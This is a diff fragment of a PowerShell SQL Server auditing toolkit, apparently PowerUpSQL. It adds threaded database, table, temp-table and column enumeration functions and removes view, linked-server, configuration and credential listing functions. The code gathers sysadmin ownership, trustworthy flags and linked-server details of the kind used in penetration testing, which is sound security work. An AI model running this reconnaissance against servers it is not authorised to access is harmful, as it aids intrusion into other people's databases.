- # Define Query - $Query = " USE $DbName; - SELECT '$ComputerName' as [ComputerName], - '$Instance' as [Instance], - CATALOG_NAME as [DatabaseName], - SCHEMA_NAME as [SchemaName], - SCHEMA_OWNER as [SchemaOwner] - FROM [$DbName].[INFORMATION_SCHEMA].[SCHEMATA] - $SchemaNameFilter - ORDER BY SCHEMA_NAME" + $Query = "$QueryStart $QueryVerSpec $QueryEnd $Filters" - # Execute Query - $TblResults = Get-SQLQuery -Instance $Instance -Query $Query -Username $Username -Password $Password -SuppressVerbose + # Execute Query + $TblResults = Get-SQLQuery -Instance $Instance -Query $Query -Username $Username -Password $Password -Credential $Credential -SuppressVerbose + + # Append results for pipeline items + $TblResults | + ForEach-Object -Process { + # Set version specific values + if([int]$SQLVersionShort -ge 10) + { + $is_broker_enabled = $_.is_broker_enabled + $is_encrypted = $_.is_encrypted + $is_read_only = $_.is_read_only + } + else + { + $is_broker_enabled = 'NA' + $is_encrypted = 'NA' + $is_read_only = 'NA' + } + + $null = $TblDatabases.Rows.Add( + $_.ComputerName, + $_.Instance, + $_.DatabaseId, + $_.DatabaseName, + $_.DatabaseOwner, + $_.OwnerIsSysadmin, + $_.is_trustworthy_on, + $_.is_db_chaining_on, + $is_broker_enabled, + $is_encrypted, + $is_read_only, + $_.create_date, + $_.recovery_model_desc, + $_.FileName, + $_.DbSizeMb, + $_.has_dbaccess + ) + } - # Append results - $TblSchemas = $TblSchemas + $TblResults - } } End { # Return data - $TblSchemas + $TblDatabases } } # ---------------------------------- -# Get-SQLView +# Get-SQLDatabaseThreaded # ---------------------------------- # Author: Scott Sutherland -Function Get-SQLView +Function Get-SQLDatabaseThreaded { <# .SYNOPSIS - Returns view information from target SQL Servers. + Returns database information from target SQL Servers. .PARAMETER Username SQL Server or domain account to authenticate with. .PARAMETER Password @@ -3444,31 +4273,39 @@ Function Get-SQLView SQL Server credential. .PARAMETER Instance SQL Server instance to connection to. + .PARAMETER DAC + Connect using Dedicated Admin Connection. .PARAMETER DatabaseName Database name to filter for. - .PARAMETER ViewName - View name to filter for. .PARAMETER NoDefaults - Only display results from non default databases. + Only select non default databases. + .PARAMETER HasAccess + Only select databases the current user has access to. + .PARAMETER SysAdminOnly + Only select databases owned by a sysadmin. + .PARAMETER Threads + Number of concurrent host threads. .EXAMPLE - PS C:\> Get-SQLView -Instance SQLServer1\STANDARDDEV2014 -DatabaseName master + PS C:\> Get-SQLDatabaseThreaded -Instance SQLServer1\STANDARDDEV2014 -NoDefaults -DatabaseName testdb - ComputerName : SQLServer1 - Instance : SQLServer1\STANDARDDEV2014 - DatabaseName : master - SchemaName : dbo - ViewName : spt_values - ViewDefinition : - create view spt_values as - select name collate database_default as name, - number, - type collate database_default as type, - low, high, status - from sys.spt_values - IsUpdatable : NO - CheckOption : NONE + ComputerName : SQLServer1 + Instance : SQLServer1\STANDARDDEV2014 + DatabaseId : 7 + DatabaseName : testdb + DatabaseOwner : sa + OwnerIsSysadmin : 1 + is_trustworthy_on : True + is_db_chaining_on : False + is_broker_enabled : True + is_encrypted : False + is_read_only : False + create_date : 4/13/2016 4:27:36 PM + recovery_model_desc : FULL + FileName : C:\Program Files\Microsoft SQL Server\MSSQL12.STANDARDDEV2014\MSSQL\DATA\testdb.mdf + DbSizeMb : 3.19 + has_dbaccess : 1 .EXAMPLE - PS C:\> Get-SQLInstanceDomain | Get-SQLView -Verbose + PS C:\> Get-SQLInstanceLocal | Get-SQLDatabaseThreaded -Verbose #> [CmdletBinding()] Param( @@ -3491,18 +4328,26 @@ Function Get-SQLView [string]$Instance, [Parameter(Mandatory = $false, + ValueFromPipeline = $true, ValueFromPipelineByPropertyName = $true, HelpMessage = 'Database name.')] [string]$DatabaseName, [Parameter(Mandatory = $false, - ValueFromPipelineByPropertyName = $true, - HelpMessage = 'View name.')] - [string]$ViewName, + HelpMessage = 'Only select non default databases.')] + [switch]$NoDefaults, [Parameter(Mandatory = $false, - HelpMessage = "Don't select tables from default databases.")] - [switch]$NoDefaults, + HelpMessage = 'Only select databases the current user has access to.')] + [switch]$HasAccess, + + [Parameter(Mandatory = $false, + HelpMessage = 'Only select databases owned by a sysadmin.')] + [switch]$SysAdminOnly, + + [Parameter(Mandatory = $false, + HelpMessage = 'Number of threads.')] + [int]$Threads = 2, [Parameter(Mandatory = $false, HelpMessage = 'Suppress verbose errors. Used when function is wrapped.')] @@ -3511,164 +4356,271 @@ Function Get-SQLView Begin { - # Table for output - $TblViews = New-Object -TypeName System.Data.DataTable + # Create data tables for output + $TblResults = New-Object -TypeName System.Data.DataTable + $TblDatabases = New-Object -TypeName System.Data.DataTable + $null = $TblDatabases.Columns.Add('ComputerName') + $null = $TblDatabases.Columns.Add('Instance') + $null = $TblDatabases.Columns.Add('DatabaseId') + $null = $TblDatabases.Columns.Add('DatabaseName') + $null = $TblDatabases.Columns.Add('DatabaseOwner') + $null = $TblDatabases.Columns.Add('OwnerIsSysadmin') + $null = $TblDatabases.Columns.Add('is_trustworthy_on') + $null = $TblDatabases.Columns.Add('is_db_chaining_on') + $null = $TblDatabases.Columns.Add('is_broker_enabled') + $null = $TblDatabases.Columns.Add('is_encrypted') + $null = $TblDatabases.Columns.Add('is_read_only') + $null = $TblDatabases.Columns.Add('create_date') + $null = $TblDatabases.Columns.Add('recovery_model_desc') + $null = $TblDatabases.Columns.Add('FileName') + $null = $TblDatabases.Columns.Add('DbSizeMb') + $null = $TblDatabases.Columns.Add('has_dbaccess') - # Setup View filter - if($ViewName) + # Setup database filter + if($DatabaseName) { - $ViewFilter = " where table_name like '%$ViewName%'" + $DatabaseFilter = " and a.name like '$DatabaseName'" } else { - $ViewFilter = '' + $DatabaseFilter = '' } - } - - Process - { - # Parse computer name from the instance - $ComputerName = Get-ComputerNameFromInstance -Instance $Instance - # Default connection to local default instance - if(-not $Instance) + # Setup NoDefault filter + if($NoDefaults) { - $Instance = $env:COMPUTERNAME + $NoDefaultsFilter = " and a.name not in ('master','tempdb','msdb','model')" } - - # Test connection to instance - $TestConnection = Get-SQLConnectionTest -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript { - $_.Status -eq 'Accessible' + else + { + $NoDefaultsFilter = '' } - if($TestConnection) + + # Setup HasAccess filter + if($HasAccess) { - if( -not $SuppressVerbose) - { - Write-Verbose -Message "$Instance : Connection Success." - Write-Verbose -Message "$Instance : Grabbing views from the databases below:" - } + $HasAccessFilter = ' and HAS_DBACCESS(a.name)=1' } else { - if( -not $SuppressVerbose) - { - Write-Verbose -Message "$Instance : Connection Failed." - } - return + $HasAccessFilter = '' } - # Setup NoDefault filter - if($NoDefaults) + # Setup owner is sysadmin filter + if($SysAdminOnly) { - # Get list of databases - $TblDatabases = Get-SQLDatabase -Instance $Instance -Username $Username -Password $Password -Credential $Credential -DatabaseName $DatabaseName -HasAccess -NoDefaults -SuppressVerbose + $SysAdminOnlyFilter = " and IS_SRVROLEMEMBER('sysadmin',SUSER_SNAME(a.owner_sid))=1" } else { - # Get list of databases - $TblDatabases = Get-SQLDatabase -Instance $Instance -Username $Username -Password $Password -Credential $Credential -DatabaseName $DatabaseName -HasAccess -SuppressVerbose + $SysAdminOnlyFilter = '' } - # Get tables for each database - $TblDatabases | - ForEach-Object -Process { - # Get database name - $DbName = $_.DatabaseName - - if( -not $SuppressVerbose) - { - Write-Verbose -Message "$Instance : - $DbName" - } + # Setup data table for pipeline threading + $PipelineItems = New-Object -TypeName System.Data.DataTable - # Define Query - $Query = " USE $DbName; - SELECT '$ComputerName' as [ComputerName], - '$Instance' as [Instance], - TABLE_CATALOG as [DatabaseName], - TABLE_SCHEMA as [SchemaName], - TABLE_NAME as [ViewName], - VIEW_DEFINITION as [ViewDefinition], - IS_UPDATABLE as [IsUpdatable], - CHECK_OPTION as [CheckOption] - FROM [INFORMATION_SCHEMA].[VIEWS] - $ViewFilter - ORDER BY TABLE_CATALOG,TABLE_SCHEMA,TABLE_NAME" - # Execute Query - $TblResults = Get-SQLQuery -Instance $Instance -Query $Query -Username $Username -Password $Password -Credential $Credential -SuppressVerbose + # set instance to local host by default + if(-not $Instance) + { + $Instance = $env:COMPUTERNAME + } - # Append results - $TblViews = $TblViews + $TblResults + # Ensure provided instance is processed + if($Instance) + { + $ProvideInstance = New-Object -TypeName PSObject -Property @{ + Instance = $Instance + } } + + # Add instance to instance list + $PipelineItems = $PipelineItems + $ProvideInstance } - End + Process { - # Return data - $TblViews + # Create list of pipeline items + $PipelineItems = $PipelineItems + $_ } -} + End + { + # Define code to be multi-threaded + $MyScriptBlock = { + # Set instance + $Instance = $_.Instance -# ---------------------------------- -# Get-SQLServerLink -# ---------------------------------- -# Author: Scott Sutherland -Function Get-SQLServerLink -{ - <# - .SYNOPSIS - Returns link servers from target SQL Servers. - .PARAMETER Username - SQL Server or domain account to authenticate with. - .PARAMETER Password - SQL Server or domain account password to authenticate with. - .PARAMETER Credential - SQL Server credential. - .PARAMETER Instance - SQL Server instance to connection to. - .PARAMETER DatabaseLinkName - Database link name to filter for. + # Parse computer name from the instance + $ComputerName = Get-ComputerNameFromInstance -Instance $Instance + + # Test connection to instance + $TestConnection = Get-SQLConnectionTest -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript { + $_.Status -eq 'Accessible' + } + if($TestConnection) + { + if( -not $SuppressVerbose) + { + Write-Verbose -Message "$Instance : Connection Success." + } + } + else + { + if( -not $SuppressVerbose) + { + Write-Verbose -Message "$Instance : Connection Failed." + } + return + } + + # Check version + $SQLVersionFull = Get-SQLServerInfo -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Select-Object -Property SQLServerVersionNumber -ExpandProperty SQLServerVersionNumber + if($SQLVersionFull) + { + $SQLVersionShort = $SQLVersionFull.Split('.')[0] + } + + # Base query + $QueryStart = " SELECT '$ComputerName' as [ComputerName], + '$Instance' as [Instance], + a.database_id as [DatabaseId], + a.name as [DatabaseName], + SUSER_SNAME(a.owner_sid) as [DatabaseOwner], + IS_SRVROLEMEMBER('sysadmin',SUSER_SNAME(a.owner_sid)) as [OwnerIsSysadmin], + a.is_trustworthy_on, + a.is_db_chaining_on," + + # Version specific columns + if([int]$SQLVersionShort -ge 10) + { + $QueryVerSpec = ' + a.is_broker_enabled, + a.is_encrypted, + a.is_read_only,' + } + + # Query end + $QueryEnd = ' + a.create_date, + a.recovery_model_desc, + b.filename as [FileName], + (SELECT CAST(SUM(size) * 8. / 1024 AS DECIMAL(8,2)) + from sys.master_files where name like a.name) as [DbSizeMb], + HAS_DBACCESS(a.name) as [has_dbaccess] + FROM [sys].[databases] a + INNER JOIN [sys].[sysdatabases] b ON a.database_id = b.dbid WHERE 1=1' + + # User defined filters + $Filters = " + $DatabaseFilter + $NoDefaultsFilter + $HasAccessFilter + $SysAdminOnlyFilter + ORDER BY a.database_id" + + $Query = "$QueryStart $QueryVerSpec $QueryEnd $Filters" + + # Execute Query + $TblResults = Get-SQLQuery -Instance $Instance -Query $Query -Username $Username -Password $Password -Credential $Credential -SuppressVerbose + + # Append results for pipeline items + $TblResults | + ForEach-Object -Process { + # Set version specific values + if([int]$SQLVersionShort -ge 10) + { + $is_broker_enabled = $_.is_broker_enabled + $is_encrypted = $_.is_encrypted + $is_read_only = $_.is_read_only + } + else + { + $is_broker_enabled = 'NA' + $is_encrypted = 'NA' + $is_read_only = 'NA' + } + + $null = $TblDatabases.Rows.Add( + $_.ComputerName, + $_.Instance, + $_.DatabaseId, + $_.DatabaseName, + $_.DatabaseOwner, + $_.OwnerIsSysadmin, + $_.is_trustworthy_on, + $_.is_db_chaining_on, + $is_broker_enabled, + $is_encrypted, + $is_read_only, + $_.create_date, + $_.recovery_model_desc, + $_.FileName, + $_.DbSizeMb, + $_.has_dbaccess + ) + } + } + + # Run scriptblock using multi-threading + $PipelineItems | Invoke-Parallel -ScriptBlock $MyScriptBlock -ImportSessionFunctions -ImportVariables -Throttle $Threads -RunspaceTimeout 2 -Quiet -ErrorAction SilentlyContinue + + return $TblDatabases + } +} + + +# ---------------------------------- +# Get-SQLTable +# ---------------------------------- +# Author: Scott Sutherland +Function Get-SQLTable +{ + <# + .SYNOPSIS + Returns table information from target SQL Servers. + .PARAMETER Username + SQL Server or domain account to authenticate with. + .PARAMETER Password + SQL Server or domain account password to authenticate with. + .PARAMETER Credential + SQL Server credential. + .PARAMETER Instance + SQL Server instance to connection to. + .PARAMETER DatabaseName + Database name to filter for. + .PARAMETER TableName + Table name to filter for. + .PARAMETER NoDefaults + Filter out results from default databases. .EXAMPLE - PS C:\> Get-SQLServerLink -Instance SQLServer1\STANDARDDEV2014 + PS C:\> Get-SQLTable -Instance SQLServer1\STANDARDDEV2014 -NoDefaults -DatabaseName testdb - ComputerName : SQLServer1 - Instance : SQLServer1\STANDARDDEV2014 - DatabaseLinkId : 0 - DatabaseLinkName : SQLServer1\STANDARDDEV2014 - DatabaseLinkLocation : Local - Product : SQL Server - Provider : SQLNCLI - Catalog : - Local Login : Uses Self Credentials - RemoteLoginName : - is_rpc_out_enabled : True - is_data_access_enabled : False - modify_date : 3/13/2016 12:30:33 PM + ComputerName : SQLServer1 + Instance : SQLServer1\STANDARDDEV2014 + DatabaseName : testdb + SchemaName : dbo + TableName : NOCList + TableType : BASE TABLE - ComputerName : SQLServer1 - Instance : SQLServer1\STANDARDDEV2014 - DatabaseLinkId : 1 - DatabaseLinkName : SQLServer2\SQLEXPRESS - DatabaseLinkLocation : Remote - Product : SQL Server - Provider : SQLNCLI - Catalog : - Local Login : - RemoteLoginName : user123 - is_rpc_out_enabled : False - is_data_access_enabled : True - modify_date : 5/6/2016 10:20:44 AM + ComputerName : SQLServer1 + Instance : SQLServer1\STANDARDDEV2014 + DatabaseName : testdb + SchemaName : dbo + TableName : tracking + TableType : BASE TABLE .EXAMPLE - PS C:\> Get-SQLInstanceLocal | Get-SQLServerLink -Verbose + PS C:\> Get-SQLInstanceDomain | Get-SQLTable -Verbose -NoDefaults #> [CmdletBinding()] Param( [Parameter(Mandatory = $false, + ValueFromPipelineByPropertyName = $true, HelpMessage = 'SQL Server or domain account to authenticate with.')] [string]$Username, [Parameter(Mandatory = $false, + ValueFromPipelineByPropertyName = $true, HelpMessage = 'SQL Server or domain account password to authenticate with.')] [string]$Password, @@ -3683,10 +4635,18 @@ Function Get-SQLServerLink [string]$Instance, [Parameter(Mandatory = $false, - ValueFromPipeline = $true, ValueFromPipelineByPropertyName = $true, - HelpMessage = 'SQL Server link name.')] - [string]$DatabaseLinkName, + HelpMessage = 'Database name.')] + [string]$DatabaseName, + + [Parameter(Mandatory = $false, + ValueFromPipelineByPropertyName = $true, + HelpMessage = 'Table name.')] + [string]$TableName, + + [Parameter(Mandatory = $false, + HelpMessage = "Don't select tables from default databases.")] + [switch]$NoDefaults, [Parameter(Mandatory = $false, HelpMessage = 'Suppress verbose errors. Used when function is wrapped.')] @@ -3695,22 +4655,23 @@ Function Get-SQLServerLink Begin { - # Table for output - $TblServerLinks = New-Object -TypeName System.Data.DataTable + $TblTables = New-Object -TypeName System.Data.DataTable - # Setup DatabaseLinkName filter - if($DatabaseLinkName) + # Setup table filter + if($TableName) { - $VDatabaseLinkNameFilter = " WHERE a.name like '$DatabaseLinkName'" + $TableFilter = " WHERE t.TableName like '%$TableName%'" } else { - $DatabaseLinkNameFilter = '' + $TableFilter = '' } } Process { + # Note: Tables queried by this function typically require sysadmin or DBO privileges. + # Parse computer name from the instance $ComputerName = Get-ComputerNameFromInstance -Instance $Instance @@ -3729,6 +4690,7 @@ Function Get-SQLServerLink if( -not $SuppressVerbose) { Write-Verbose -Message "$Instance : Connection Success." + Write-Verbose -Message "$Instance : Grabbing tables from databases below:" } } else @@ -3740,58 +4702,77 @@ Function Get-SQLServerLink return } - # Define Query - $Query = " SELECT '$ComputerName' as [ComputerName], - '$Instance' as [Instance], - a.server_id as [DatabaseLinkId], - a.name AS [DatabaseLinkName], - CASE a.Server_id - WHEN 0 - THEN 'Local' - ELSE 'Remote' - END AS [DatabaseLinkLocation], - a.product as [Product], - a.provider as [Provider], - a.catalog as [Catalog], - 'LocalLogin' = CASE b.uses_self_credential - WHEN 1 THEN 'Uses Self Credentials' - ELSE c.name - END, - b.remote_name AS [RemoteLoginName], - a.is_rpc_out_enabled, - a.is_data_access_enabled, - a.modify_date - FROM [Master].[sys].[Servers] a - LEFT JOIN [Master].[sys].[linked_logins] b - ON a.server_id = b.server_id - LEFT JOIN [Master].[sys].[server_principals] c - ON c.principal_id = b.local_principal_id - $DatabaseLinkNameFilter" - - # Execute Query - $TblResults = Get-SQLQuery -Instance $Instance -Query $Query -Username $Username -Password $Password -Credential $Credential -SuppressVerbose + # Setup NoDefault filter + if($NoDefaults) + { + # Get list of databases + $TblDatabases = Get-SQLDatabase -Instance $Instance -Username $Username -Password $Password -Credential $Credential -DatabaseName $DatabaseName -HasAccess -NoDefaults -SuppressVerbose + } + else + { + # Get list of databases + $TblDatabases = Get-SQLDatabase -Instance $Instance -Username $Username -Password $Password -Credential $Credential -DatabaseName $DatabaseName -HasAccess -SuppressVerbose + } - # Append results - $TblServerLinks = $TblServerLinks + $TblResults + # Get tables for each database + $TblDatabases | + ForEach-Object -Process { + # Get database name + $DbName = $_.DatabaseName + + if( -not $SuppressVerbose) + { + Write-Verbose -Message "$Instance : - $DbName" + } + + # Define Query + $Query = " USE $DbName; + SELECT '$ComputerName' as [ComputerName], + '$Instance' as [Instance], + t.TABLE_CATALOG AS [DatabaseName], + t.TABLE_SCHEMA AS [SchemaName], + t.TABLE_NAME AS [TableName], + CASE + WHEN (SELECT CASE WHEN LEN(t.TABLE_NAME) - LEN(REPLACE(t.TABLE_NAME,'#','')) > 1 THEN 1 ELSE 0 END) = 1 THEN 'GlobalTempTable' + WHEN t.TABLE_NAME LIKE '%[_]%' AND (SELECT CASE WHEN LEN(t.TABLE_NAME) - LEN(REPLACE(t.TABLE_NAME,'#','')) = 1 THEN 1 ELSE 0 END) = 1 THEN 'LocalTempTable' + WHEN t.TABLE_NAME NOT LIKE '%[_]%' AND (SELECT CASE WHEN LEN(t.TABLE_NAME) - LEN(REPLACE(t.TABLE_NAME,'#','')) = 1 THEN 1 ELSE 0 END) = 1 THEN 'TableVariable' + ELSE t.TABLE_TYPE + END AS TableType, + s.is_ms_shipped, + s.is_published, + s.is_schema_published, + s.create_date, + s.modify_date AS modified_date + FROM [$DbName].[INFORMATION_SCHEMA].[TABLES] t + JOIN sys.tables st ON t.TABLE_NAME = st.name AND t.TABLE_SCHEMA = OBJECT_SCHEMA_NAME(st.object_id) + JOIN sys.objects s ON st.object_id = s.object_id + $TableFilter + ORDER BY t.TABLE_CATALOG, t.TABLE_SCHEMA, t.TABLE_NAME" + + # Execute Query + $TblResults = Get-SQLQuery -Instance $Instance -Query $Query -Username $Username -Password $Password -Credential $Credential -SuppressVerbose + + # Append results + $TblTables = $TblTables + $TblResults + } } End { # Return data - $TblServerLinks + $TblTables } } - # ---------------------------------- -# Get-SQLServerConfiguration +# Get-SQLTableTemp # ---------------------------------- # Author: Scott Sutherland -Function Get-SQLServerConfiguration +Function Get-SQLTableTemp { <# .SYNOPSIS - Returns configuration information from the server using sp_configure. + Returns table information from target SQL Servers. .PARAMETER Username SQL Server or domain account to authenticate with. .PARAMETER Password @@ -3799,19 +4780,73 @@ Function Get-SQLServerConfiguration .PARAMETER Credential SQL Server credential. .PARAMETER Instance - SQL Server instance to connection to. + SQL Server instance to connection to. .EXAMPLE - PS C:\> Get-SQLServerConfiguration -Instance SQLServer1\STANDARDDEV2014 + PS C:\> Get-SQLTableTemp -Instance SQLServer1\STANDARDDEV2014 + + Table_Name : #B6E36D7A + Column_Name : SnapshotDataId + Column_Type : uniqueidentifier + Table_Type : TableVariable + is_ms_shipped : False + is_published : False + is_schema_published : False + create_date : 5/14/2024 6:09:48 PM + modify_date : 5/14/2024 6:09:48 PM + + Table_Name : #LocalTempTbl____________________________________________ + _________________________________________________________ + __00000000002D + Column_Name : Testing123 + Column_Type : text + Table_Type : LocalTempTable + is_ms_shipped : False + is_published : False + is_schema_published : False + create_date : 5/15/2024 4:37:46 PM + modify_date : 5/15/2024 4:37:46 PM + + Table_Name : ##GlobalTempTbl + Column_Name : Spy_id + Column_Type : int + Table_Type : GlobalTempTable + is_ms_shipped : False + is_published : False + is_schema_published : False + create_date : 5/15/2024 4:38:10 PM + modify_date : 5/15/2024 4:38:10 PM + + Table_Name : ##GlobalTempTbl + Column_Name : SpyName + Column_Type : text + Table_Type : GlobalTempTable + is_ms_shipped : False + is_published : False + is_schema_published : False + create_date : 5/15/2024 4:38:10 PM + modify_date : 5/15/2024 4:38:10 PM + + Table_Name : ##GlobalTempTbl + Column_Name : RealName + Column_Type : text + Table_Type : GlobalTempTable + is_ms_shipped : False + is_published : False + is_schema_published : False + create_date : 5/15/2024 4:38:10 PM + modify_date : 5/15/2024 4:38:10 PM .EXAMPLE - PS C:\> Get-SQLInstanceLocal | Get-SQLServerConfiguration -Verbose + PS C:\> Get-SQLInstanceDomain | Get-SQLTableTemp -Verbose #> [CmdletBinding()] Param( [Parameter(Mandatory = $false, + ValueFromPipelineByPropertyName = $true, HelpMessage = 'SQL Server or domain account to authenticate with.')] [string]$Username, [Parameter(Mandatory = $false, + ValueFromPipelineByPropertyName = $true, HelpMessage = 'SQL Server or domain account password to authenticate with.')] [string]$Password, @@ -3825,206 +4860,109 @@ Function Get-SQLServerConfiguration HelpMessage = 'SQL Server instance to connection to.')] [string]$Instance, - [Parameter(Mandatory = $false, - ValueFromPipelineByPropertyName = $true, - HelpMessage = 'Nubmer of hosts to query at one time.')] - [int]$Threads = 5, - [Parameter(Mandatory = $false, HelpMessage = 'Suppress verbose errors. Used when function is wrapped.')] [switch]$SuppressVerbose ) + Begin { - # Setup data table for output - $TblCommands = New-Object -TypeName System.Data.DataTable - $TblResults = New-Object -TypeName System.Data.DataTable - $null = $TblResults.Columns.Add('ComputerName') - $null = $TblResults.Columns.Add('Instance') - $null = $TblResults.Columns.Add('Name') - $null = $TblResults.Columns.Add('Minimum') - $null = $TblResults.Columns.Add('Maximum') - $null = $TblResults.Columns.Add('config_value') - $null = $TblResults.Columns.Add('run_value') - - - # Setup data table for pipeline threading - $PipelineItems = New-Object -TypeName System.Data.DataTable + $TblTables = New-Object -TypeName System.Data.DataTable - # set instance to local host by default - if(-not $Instance) + # Setup table filter + if($TableName) { - $Instance = $env:COMPUTERNAME + $TableFilter = " where table_name like '%$TableName%'" } - - # Ensure provided instance is processed - if($Instance) + else { - $ProvideInstance = New-Object -TypeName PSObject -Property @{ - Instance = $Instance - } + $TableFilter = '' } - - # Add instance to instance list - $PipelineItems = $PipelineItems + $ProvideInstance } Process { - # Create list of pipeline items - $PipelineItems = $PipelineItems + $_ - } - - End - { - # Define code to be multi-threaded - $MyScriptBlock = { - $Instance = $_.Instance + # Note: Tables queried by this function can be executed by any login. - # Parse computer name from the instance - $ComputerName = Get-ComputerNameFromInstance -Instance $Instance + # Parse computer name from the instance + $ComputerName = Get-ComputerNameFromInstance -Instance $Instance - # Default connection to local default instance - if(-not $Instance) - { - $Instance = $env:COMPUTERNAME - } + # Default connection to local default instance + if(-not $Instance) + { + $Instance = $env:COMPUTERNAME + } - # Setup DAC string - if($DAC) + # Test connection to instance + $TestConnection = Get-SQLConnectionTest -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript { + $_.Status -eq 'Accessible' + } + if($TestConnection) + { + if( -not $SuppressVerbose) { - # Create connection object - $Connection = Get-SQLConnectionObject -Instance $Instance -Username $Username -Password $Password -Credential $Credential -DAC -TimeOut $TimeOut + Write-Verbose -Message "$Instance : Connection Success." + Write-Verbose -Message "$Instance : Grabbing tables from databases below:" } - else + } + else + { + if( -not $SuppressVerbose) { - # Create connection object - $Connection = Get-SQLConnectionObject -Instance $Instance -Username $Username -Password $Password -Credential $Credential -TimeOut $TimeOut + Write-Verbose -Message "$Instance : Connection Failed." } + return + } - # Attempt connection - try - { - # Open connection - $Connection.Open() - - if(-not $SuppressVerbose) - { - Write-Verbose -Message "$Instance : Connection Success." - } - - # Switch to track advanced options - $DisableShowAdvancedOptions = 0 - - # Get show advance status - $IsShowAdvancedEnabled = Get-SQLQuery -Instance $Instance -Query "sp_configure 'Show Advanced Options'" -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Select-Object -Property config_value -ExpandProperty config_value - - # Get sysadmin status - $IsSysadmin = Get-SQLSysadminCheck -Instance $Instance -Credential $Credential -Username $Username -Password $Password -SuppressVerbose | Select-Object -Property IsSysadmin -ExpandProperty IsSysadmin - - # Enable show advanced options if needed - if ($IsShowAdvancedEnabled -eq 1) - { - if(-not $SuppressVerbose) - { - Write-Verbose -Message "$Instance : Show Advanced Options is already enabled." - } - } - else - { - if(-not $SuppressVerbose) - { - Write-Verbose -Message "$Instance : Show Advanced Options is disabled." - } - - if($IsSysadmin -eq 'Yes') - { - if(-not $SuppressVerbose) - { - Write-Verbose -Message "$Instance : Your a sysadmin, trying to enabled it." - } - - # Try to enable Show Advanced Options - Get-SQLQuery -Instance $Instance -Query "sp_configure 'Show Advanced Options',1;RECONFIGURE" -Username $Username -Password $Password -Credential $Credential -SuppressVerbose - - # Check if configuration change worked - $IsShowAdvancedEnabled2 = Get-SQLQuery -Instance $Instance -Query "sp_configure 'Show Advanced Options'" -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Select-Object -Property config_value -ExpandProperty config_value - - if ($IsShowAdvancedEnabled2 -eq 1) - { - $DisableShowAdvancedOptions = 1 - if(-not $SuppressVerbose) - { - Write-Verbose -Message "$Instance : Enabled Show Advanced Options." - } - } - else - { - if(-not $SuppressVerbose) - { - Write-Verbose -Message "$Instance : Enabling Show Advanced Options failed. Aborting." - } - } - } - } - - # Run sp_confgiure - Get-SQLQuery -Instance $Instance -Query 'sp_configure' -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | - ForEach-Object -Process { - $SettingName = $_.name - $SettingMin = $_.minimum - $SettingMax = $_.maximum - $SettingConf_value = $_.config_value - $SettingRun_value = $_.run_value - - $null = $TblResults.Rows.Add($ComputerName, $Instance, $SettingName, $SettingMin, $SettingMax, $SettingConf_value, $SettingRun_value) - } - - # Restore Show Advanced Options state if needed - if($DisableShowAdvancedOptions -eq 1 -and $IsSysadmin -eq 'Yes') - { - if(-not $SuppressVerbose) - { - Write-Verbose -Message "$Instance : Disabling Show Advanced Options" - } - $Configurations = Get-SQLQuery -Instance $Instance -Query "sp_configure 'Show Advanced Options',0;RECONFIGURE" -Username $Username -Password $Password -Credential $Credential -SuppressVerbose - } - - # Close connection - $Connection.Close() + # Define Query + $Query = "SELECT SERVERPROPERTY('MachineName') as Computer_Name, + @@SERVERNAME AS Instance, + 'tempdb' as 'Database_Name', + SCHEMA_NAME(t1.schema_id) AS 'Schema_Name', + t1.name AS 'Table_Name', + CASE + WHEN (SELECT CASE WHEN LEN(t1.name) - LEN(REPLACE(t1.name,'#','')) > 1 THEN 1 ELSE 0 END) = 1 THEN 'GlobalTempTable' + WHEN t1.name LIKE '%[_]%' AND (SELECT CASE WHEN LEN(t1.name) - LEN(REPLACE(t1.name,'#','')) = 1 THEN 1 ELSE 0 END) = 1 THEN 'LocalTempTable' + WHEN t1.name NOT LIKE '%[_]%' AND (SELECT CASE WHEN LEN(t1.name) - LEN(REPLACE(t1.name,'#','')) = 1 THEN 1 ELSE 0 END) = 1 THEN 'TableVariable' + ELSE NULL + END AS Table_Type, + t2.name AS 'Column_Name', + t3.name AS 'Column_Type', + t1.is_ms_shipped, + t1.is_published, + t1.is_schema_published, + t1.create_date, + t1.modify_date + FROM [tempdb].[sys].[objects] AS t1 + JOIN [tempdb].[sys].[columns] AS t2 ON t1.OBJECT_ID = t2.OBJECT_ID + JOIN sys.types AS t3 ON t2.system_type_id = t3.system_type_id + WHERE t1.name LIKE '#%'; + " - # Dispose connection - $Connection.Dispose() - } - catch - { - # Connection failed - if(-not $SuppressVerbose) - { - $ErrorMessage = $_.Exception.Message - Write-Verbose -Message "$Instance : Connection Failed." - #Write-Verbose " Error: $ErrorMessage" - } - } - } + # Execute Query + $TblResults = Get-SQLQuery -Instance $Instance -Query $Query -Username $Username -Password $Password -Credential $Credential -SuppressVerbose - # Run scriptblock using multi-threading - $PipelineItems | Invoke-Parallel -ScriptBlock $MyScriptBlock -ImportSessionFunctions -ImportVariables -Throttle $Threads -RunspaceTimeout 2 -Quiet -ErrorAction SilentlyContinue + # Append results + $TblTables = $TblTables + $TblResults + } - return $TblResults + End + { + # Return data + $TblTables } } # ---------------------------------- -# Get-SQLServerCredential +# Get-SQLColumn # ---------------------------------- # Author: Scott Sutherland -Function Get-SQLServerCredential +Function Get-SQLColumn { <# .SYNOPSIS - Returns credentials from target SQL Servers. + Returns column information from target SQL Servers. Supports keyword search. .PARAMETER Username SQL Server or domain account to authenticate with. .PARAMETER Password @@ -4033,29 +4971,32 @@ Function Get-SQLServerCredential SQL Server credential. .PARAMETER Instance SQL Server instance to connection to. + .PARAMETER DAC + Connect using Dedicated Admin Connection. + .PARAMETER DatabaseName + Database name filter. + .PARAMETER TableName + Table name filter. + .PARAMETER ColumnName + Column name filter. + .PARAMETER ColumnNameSearch + Column name filter that support wildcards. + .PARAMETER NoDefaults + Don't list anything from default databases. .EXAMPLE - PS C:\> Get-SQLServerCredential -Instance SQLServer1\STANDARDDEV2014 - - ComputerName : SQLServer1 - Instance : SQLServer1\STANDARDDEV2014 - credential_id : 65536 - CredentialName : MyUser - credential_identity : Domain\MyUser - create_date : 5/5/2016 11:16:12 PM - modify_date : 5/5/2016 11:16:12 PM - target_type : - target_id : - 